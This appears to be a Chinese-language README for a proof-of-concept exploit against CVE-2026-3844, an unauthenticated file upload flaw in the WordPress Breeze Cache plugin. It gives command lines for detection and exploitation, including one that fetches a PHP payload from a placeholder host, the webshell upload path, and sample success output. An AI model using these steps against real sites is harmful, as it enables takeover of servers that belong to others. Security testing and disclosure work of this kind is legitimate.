
Python 概念验证,针对 CVE-2026-3844,即 WordPress Breeze Cache 插件中的未认证任意文件上传漏洞,可实现远程代码执行。包含检测、利用及 webshell 验证。
本仓库包含一个 Python 概念验证(PoC)脚本,用于演示影响 WordPress Breeze Cache 插件 <= 2.4.4 的未认证任意文件上传漏洞。
⚠️ 本项目仅严格用于授权安全测试、教育研究和防御性验证目的。
该漏洞滥用 Breeze Cache 的 gravatar 缓存功能,将攻击者控制的文件存储到 WordPress 缓存目录中。
pycurltermcolor安装依赖:
pip install pycurl termcolor
| 文件 | 描述 |
|---|---|
CVE-2026-3844.py | 主 PoC 利用脚本 |
CVE-2026-3844.yaml | YAML 模板/配置 |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
该脚本执行以下步骤:
上传的载荷可能从以下路径被访问:
/wp-content/cache/breeze-extra/gravatars/
成功利用可能取决于以下 Breeze 设置是否已启用:
Host Files Locally - Gravatars
如果该功能被禁用,利用尝试可能会失败。
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
本仓库提供用于:
请勿将本项目用于您不拥有或未经明确许可进行测试的系统。
作者对因使用本项目造成的滥用或损害不承担任何责任。
网站管理员应:
/wp-content/cache/ 目录中的可疑文件本概念验证旨在帮助:
了解与不安全的缓存机制和任意文件上传相关的安全风险。
安全研究 / 教育项目